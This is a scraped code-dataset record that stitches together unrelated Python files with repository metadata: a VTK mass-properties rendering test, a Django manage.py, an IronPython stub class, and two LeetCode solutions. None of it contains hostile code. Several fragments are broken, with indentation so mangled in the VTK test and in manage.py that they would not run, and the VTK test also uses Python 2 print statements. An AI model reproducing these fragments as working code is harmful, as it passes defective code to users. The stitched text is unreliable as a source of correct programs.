        # never repositioned, so the final layout is sphere, cube, cone.
        coneActor.SetPosition(5, 0, 0)
        ren.AddActor(cubeActor)
tf = dict()
mp = dict()
vt = dict()
pdm = dict()
ta = dict()
def MakeText(primitive):
tf.update({primitive: vtk.vtkTriangleFilter()})
tf[primitive].SetInputConnection(primitive.GetOutputPort())
mp.update({primitive: vtk.vtkMassProperties()})
mp[primitive].SetInputConnection(tf[primitive].GetOutputPort())
# here we capture stdout and write it to a variable for processing.
summary = StringIO.StringIO()
# save the original stdout
old_stdout = sys.stdout
sys.stdout = summary
print mp[primitive]
summary = summary.getvalue()
startSum = summary.find(" VolumeX")
endSum = len(summary)
print summary[startSum:]
# Restore stdout
sys.stdout = old_stdout
vt.update({primitive: vtk.vtkVectorText()})
vt[primitive].SetText(summary[startSum:])
pdm.update({primitive: vtk.vtkPolyDataMapper()})
pdm[primitive].SetInputConnection(vt[primitive].GetOutputPort())
ta.update({primitive: vtk.vtkActor()})
ta[primitive].SetMapper(pdm[primitive])
ta[primitive].SetScale(.2, .2, .2)
return ta[primitive]
ren.AddActor(MakeText(sphere))
ren.AddActor(MakeText(cube))
ren.AddActor(MakeText(cone))
ta[sphere].SetPosition(sphereActor.GetPosition())
ta[sphere].AddPosition(-2, -1, 0)
ta[cube].SetPosition(cubeActor.GetPosition())
ta[cube].AddPosition(-2, -1, 0)
ta[cone].SetPosition(coneActor.GetPosition())
ta[cone].AddPosition(-2, -1, 0)
ren.SetBackground(0.1, 0.2, 0.4)
renWin.SetSize(786, 256)
# render the image
#
ren.ResetCamera()
cam1 = ren.GetActiveCamera()
cam1.Dolly(3)
ren.ResetCameraClippingRange()
# render and interact with data
iRen = vtk.vtkRenderWindowInteractor()
        iRen.SetRenderWindow(renWin)
renWin.Render()
img_file = "MassProperties.png"
vtk.test.Testing.compareImage(iRen.GetRenderWindow(), vtk.test.Testing.getAbsImagePath(img_file), threshold=25)
vtk.test.Testing.interact()
if __name__ == "__main__":
vtk.test.Testing.main([(MassProperties, 'test')])
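
# Note on the stdout capture in MakeText(): printing a VTK object dumps its
# full state, so the test temporarily points sys.stdout at a StringIO buffer,
# keeps the text from " VolumeX" onward, and renders it with vtkVectorText.
# (A Python 3 port would use io.StringIO with contextlib.redirect_stdout.)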
|
[
"nikhil.shetty@kitware.com"
] |
nikhil.shetty@kitware.com
|
b589b99088f59ac54b08810c679c36224ffbb831
|
b00b570c551044438c0cc2f10d13458dc06d7613
|
/blog/manage.py
|
04b540c28bb66d56d0fd30fdc4ac7f885faba4a4
|
[] |
no_license
|
shiretree/Blog
|
a938885d84265dfdafb338a4f226f0f52bb1cb10
|
9ed94c4a59468c2dea30c17cfdfe396f3e1e40b9
|
refs/heads/master
| 2020-08-18T18:33:39.991254
| 2019-10-25T15:31:35
| 2019-10-25T15:31:35
| 215,821,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 868
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    profile = os.environ.get('blog_PROFILE', 'develop')
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "blog.setting.%s" % profile)
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
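
# Usage sketch (assumes settings modules live at blog/setting/<profile>.py,
# with "develop" as the fallback profile):
#   blog_PROFILE=develop python manage.py runserver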
|
[
"email"
] |
email
|
237d8804034a2eb54bcae35783ec451375f13cef
|
60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24
|
/IronPythonStubs/release/stubs.min/System/Security/AccessControl_parts/SemaphoreAuditRule.py
|
4209494d452e4bc8c10f25f9e20fabe9f90a6b55
|
[
"MIT"
] |
permissive
|
shnlmn/Rhino-Grasshopper-Scripts
|
a9411098c5d1bbc55feb782def565d535b27b709
|
0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823
|
refs/heads/master
| 2020-04-10T18:59:43.518140
| 2020-04-08T02:49:07
| 2020-04-08T02:49:07
| 161,219,695
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
class SemaphoreAuditRule(AuditRule):
"""
Represents a set of access rights to be audited for a user or group. This class cannot be inherited.
SemaphoreAuditRule(identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags)
"""
@staticmethod
def __new__(self,identity,eventRights,flags):
""" __new__(cls: type,identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags) """
pass
AccessMask=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access mask for this rule.
"""
SemaphoreRights=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access rights affected by the audit rule.
Get: SemaphoreRights(self: SemaphoreAuditRule) -> SemaphoreRights
"""
|
[
"magnetscoil@gmail.com"
] |
magnetscoil@gmail.com
|
bc1dbcc61274452333d727b7e2e93d0812fbc166
|
9222114c0b39007eb1af715cf18fc95ff282b38c
|
/problems/725. Split Linked List in Parts/2 - Hash Table.py
|
297fd75088427c8359ee2f838bbe5019b7190014
|
[] |
no_license
|
Vasilic-Maxim/LeetCode-Problems
|
1a2a09edca6489a349e5d69d087279630cff157d
|
359f3b78da90c41c7e42e5c9e13d49b4fc67fe41
|
refs/heads/master
| 2021-07-10T22:03:29.327658
| 2021-06-07T12:42:52
| 2021-06-07T12:42:52
| 246,826,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
from typing import List, Any
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def splitListToParts(self, root: ListNode, k: int) -> List[Any]:
"""
We always pay with time proportional to O(n + k). The worst
case arises when k > n.
Time: O(n + k)
Space: O(n + k)
"""
ids = []
while root is not None:
ids.append(root)
root = root.next
result = [None] * k
div, mod = divmod(len(ids), k)
start = 0
for i in range(k):
if start < len(ids):
result[i] = ids[start]
start += div + (mod > 0)
ids[start - 1].next = None
mod -= 1
return result
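

if __name__ == "__main__":
    # Editor's sketch: splitting 1->2->3 into 5 parts yields [1], [2], [3]
    # and two empty parts, matching the "sizes differ by at most one" rule.
    head = ListNode(1, ListNode(2, ListNode(3)))
    for part in Solution().splitListToParts(head, 5):
        vals = []
        while part:
            vals.append(part.val)
            part = part.next
        print(vals)  # [1], [2], [3], [], []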
|
[
"lmantenl@gmail.com"
] |
lmantenl@gmail.com
|
788645067729b6ef213aed8af530ea537fe1dbbd
|
f90bb6e4a0d47c2c78362e431b47f74395bd42dd
|
/BitwiseORofSubarray.py
|
86117d5012ccf447c11b90a59621899ac47e9c1f
|
[] |
no_license
|
sainihimanshu1999/Dynamic-Programming
|
bc8811d10625af3bc4b81a4eb219b9b84f4e6821
|
65427f049b8b671e2a412497bbb06de8e8497823
|
refs/heads/main
| 2023-04-20T13:53:53.031324
| 2021-05-15T18:03:45
| 2021-05-15T18:03:45
| 365,940,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 519
|
py
|
'''
LeetCode 898 (Bitwise ORs of Subarrays). Bitwise OR sets a result bit to 1
when either operand has that bit set. For every index i we keep the set of
ORs of all subarrays ending at i: it is {nums[i]} together with nums[i]
OR'd against each value in the previous index's set. The answer is the
size of the union of all these sets.
'''


def bitWiseOr(nums):  # the original snippet had a stray LeetCode-style `self`
    # {nums[i]} builds a one-element set; set(nums[i]) would wrongly try to
    # iterate over an int.
    table = [{nums[i]} for i in range(len(nums))]
    for i in range(1, len(nums)):
        for pre in table[i - 1]:
            table[i].add(nums[i] | pre)
    return len(set.union(*table)) if len(nums) > 0 else 0
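

if __name__ == "__main__":
    # LeetCode 898's example: the distinct subarray ORs of [1, 1, 2] are
    # {1, 2, 3}, so the function returns 3.
    print(bitWiseOr([1, 1, 2]))  # 3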
|
[
"sainihimanshu.1999@gmail.com"
] |
sainihimanshu.1999@gmail.com
|